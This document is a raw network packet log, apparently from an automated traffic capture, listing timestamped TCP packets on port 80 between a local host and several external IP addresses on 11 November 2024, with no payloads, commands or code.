                                                                                                Nov 11, 2024 17:03:48.151885033 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.152043104 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:48.159785032 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:48.497725964 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.564088106 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.564110994 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.564130068 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.564156055 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.564245939 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.564265966 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.564270020 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:48.564280987 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.564295053 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.564405918 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.564409018 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.564512968 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:48.564560890 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:48.902060986 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902110100 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902118921 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902127028 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902277946 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902288914 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902297020 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902304888 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902307987 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:48.902312994 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902319908 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902328014 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902422905 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902425051 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902425051 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902426004 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902451038 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:48.902499914 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:48.902621031 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902621984 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902622938 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902622938 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902622938 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:48.902622938 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:48.902818918 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:48.902818918 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:49.241247892 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.241257906 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.241267920 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.241435051 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.241511106 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:49.241545916 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.241556883 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.241564989 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.241571903 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.241580009 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.241586924 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.241588116 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:49.241595030 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.241602898 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.241612911 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.241622925 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.241631031 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.241780043 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:49.241780043 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:49.241780043 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:49.241874933 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.241883993 CET804979243.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:49.242019892 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:49.242114067 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:49.662916899 CET4979280192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:50.680371046 CET4979380192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:51.041126966 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.041357994 CET4979380192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:51.048891068 CET4979380192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:51.393167019 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.457091093 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.457124949 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.457142115 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.457258940 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.457278967 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.457293987 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.457297087 CET4979380192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:51.457305908 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.457321882 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.457335949 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.457402945 CET4979380192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:51.457452059 CET4979380192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:51.488423109 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.488722086 CET4979380192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:51.816201925 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816215038 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816303015 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816317081 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816359043 CET4979380192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:51.816423893 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816452980 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816462994 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816473007 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816483021 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816493034 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816503048 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816512108 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816521883 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816545963 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816548109 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816555977 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816566944 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816576004 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.816612959 CET4979380192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:51.816672087 CET4979380192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:51.816843033 CET4979380192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:51.844361067 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.844373941 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:51.844604015 CET4979380192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:52.178433895 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:52.178484917 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:52.178519964 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:52.178550005 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:52.178579092 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:52.178607941 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:52.178642988 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:52.178658009 CET4979380192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:52.178675890 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:52.178708076 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:52.178733110 CET4979380192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:52.178736925 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:52.178767920 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:52.178801060 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:52.178838015 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:52.178864002 CET4979380192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:52.178868055 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:52.178898096 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:52.178898096 CET4979380192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:52.178926945 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:52.178953886 CET804979343.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:52.178982973 CET4979380192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:52.179115057 CET4979380192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:52.552977085 CET4979380192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:53.570519924 CET4979480192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:53.909540892 CET804979443.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:53.909728050 CET4979480192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:53.917448997 CET4979480192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:53.917474031 CET4979480192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:53.917547941 CET4979480192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:54.290658951 CET804979443.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:54.290762901 CET804979443.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:54.290772915 CET804979443.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:54.290879965 CET804979443.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:54.974230051 CET4979480192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:55.312577963 CET804979443.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:55.312825918 CET4979480192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:55.427278996 CET4979480192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:55.653909922 CET804979443.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:55.653994083 CET804979443.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:55.721596956 CET804979443.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:55.721606016 CET804979443.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:55.721613884 CET804979443.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:55.721625090 CET804979443.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:55.721638918 CET804979443.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:55.721646070 CET804979443.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:55.721652031 CET804979443.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:55.721658945 CET804979443.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:55.721667051 CET804979443.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:55.722002029 CET4979480192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:55.722168922 CET4979480192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:55.722168922 CET4979480192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:55.754252911 CET804979443.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:55.754542112 CET4979480192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:55.812824965 CET804979443.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:55.812952042 CET4979480192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:56.444750071 CET4979580192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:56.787739992 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:56.787944078 CET4979580192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:56.792992115 CET4979580192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:57.147222042 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.210907936 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.210918903 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.211014986 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.211024046 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.211033106 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.211117983 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.211126089 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.211133957 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.211142063 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.211154938 CET4979580192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:57.211265087 CET4979580192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:57.211445093 CET4979580192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:57.242417097 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.242688894 CET4979580192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:57.583259106 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.583333015 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.583343029 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.583352089 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.583441973 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.583453894 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.583462000 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.583470106 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.583477974 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.583486080 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.583561897 CET4979580192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:57.583561897 CET4979580192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:57.583595991 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.583606005 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.583615065 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.583617926 CET4979580192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:57.583625078 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.583631992 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.583640099 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.583647966 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.583669901 CET4979580192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:57.583724022 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.583739042 CET4979580192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:57.583837032 CET4979580192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:57.583890915 CET4979580192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:57.615852118 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.615940094 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.616147995 CET4979580192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:57.922332048 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.922342062 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.922434092 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.922442913 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.922451019 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.922519922 CET4979580192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:57.922528028 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.922539949 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.922547102 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.922554016 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.922561884 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.922569990 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.922579050 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.922586918 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.922594070 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.922601938 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.922609091 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.922615051 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:03:57.922640085 CET4979580192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:57.922709942 CET4979580192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:57.922709942 CET4979580192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:57.922723055 CET4979580192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:57.922723055 CET4979580192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:57.922804117 CET4979580192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:57.922996998 CET4979580192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:57.924825907 CET4979580192.168.11.2043.156.106.109
                                                                                                Nov 11, 2024 17:03:58.281824112 CET804979543.156.106.109192.168.11.20
                                                                                                Nov 11, 2024 17:04:03.107548952 CET4979680192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:03.224565029 CET80497963.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:03.224780083 CET4979680192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:03.232256889 CET4979680192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:03.349294901 CET80497963.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:03.367245913 CET80497963.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:03.367384911 CET4979680192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:04.737739086 CET4979680192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:04.854837894 CET80497963.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:05.755419016 CET4979780192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:05.891345024 CET80497973.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:05.891510010 CET4979780192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:05.900044918 CET4979780192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:06.034849882 CET80497973.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:06.035382986 CET80497973.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:06.035578966 CET4979780192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:07.409040928 CET4979780192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:07.543697119 CET80497973.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:08.426882029 CET4979880192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:08.563256025 CET80497983.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:08.563450098 CET4979880192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:08.571146965 CET4979880192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:08.571218967 CET4979880192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:08.707583904 CET80497983.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:08.708527088 CET80497983.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:11.097755909 CET4979980192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:11.233315945 CET80497993.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:11.233500957 CET4979980192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:11.238552094 CET4979980192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:11.372533083 CET80497993.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:11.374330044 CET80497993.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:11.374340057 CET80497993.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:11.374664068 CET4979980192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:11.376454115 CET4979980192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:11.510384083 CET80497993.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:42.308614016 CET4980480192.168.11.2085.159.66.93
                                                                                                Nov 11, 2024 17:04:42.564047098 CET804980485.159.66.93192.168.11.20
                                                                                                Nov 11, 2024 17:04:42.564341068 CET4980480192.168.11.2085.159.66.93
                                                                                                Nov 11, 2024 17:04:42.569380999 CET4980480192.168.11.2085.159.66.93
                                                                                                Nov 11, 2024 17:04:42.827742100 CET804980485.159.66.93192.168.11.20
                                                                                                Nov 11, 2024 17:04:42.828035116 CET4980480192.168.11.2085.159.66.93
                                                                                                Nov 11, 2024 17:04:42.829829931 CET4980480192.168.11.2085.159.66.93
                                                                                                Nov 11, 2024 17:04:43.085002899 CET804980485.159.66.93192.168.11.20
                                                                                                Nov 11, 2024 17:04:47.841928959 CET4980580192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:47.977658987 CET80498053.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:47.977910995 CET4980580192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:47.985476971 CET4980580192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:48.119690895 CET80498053.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:48.120028973 CET80498053.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:48.120286942 CET4980580192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:49.493582964 CET4980580192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:49.627883911 CET80498053.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:50.512089968 CET4980680192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:51.524370909 CET4980680192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:51.660054922 CET80498063.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:51.660293102 CET4980680192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:51.667788982 CET4980680192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:51.803170919 CET80498063.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:51.803627014 CET80498063.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:51.803855896 CET4980680192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:53.180300951 CET4980680192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:53.315716028 CET80498063.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:54.197681904 CET4980780192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:54.333487988 CET80498073.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:54.333674908 CET4980780192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:54.341337919 CET4980780192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:54.341358900 CET4980780192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:54.341432095 CET4980780192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:54.341604948 CET4980780192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:54.475569010 CET80498073.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:54.475675106 CET80498073.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:54.475688934 CET80498073.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:54.475795984 CET80498073.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:54.475888968 CET80498073.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:54.476746082 CET80498073.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:56.870801926 CET4980880192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:57.006685019 CET80498083.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:57.006938934 CET4980880192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:57.016514063 CET4980880192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:57.150962114 CET80498083.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:57.152563095 CET80498083.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:57.152573109 CET80498083.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:04:57.152971029 CET4980880192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:57.156615019 CET4980880192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:04:57.291064978 CET80498083.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:05:02.164768934 CET4980980192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:05:02.301676035 CET80498093.33.130.190192.168.11.20
                                                                                                Nov 11, 2024 17:05:02.301912069 CET4980980192.168.11.203.33.130.190
                                                                                                Nov 11, 2024 17:05:02.310331106 CET4980980192.168.11.203.33.130.190
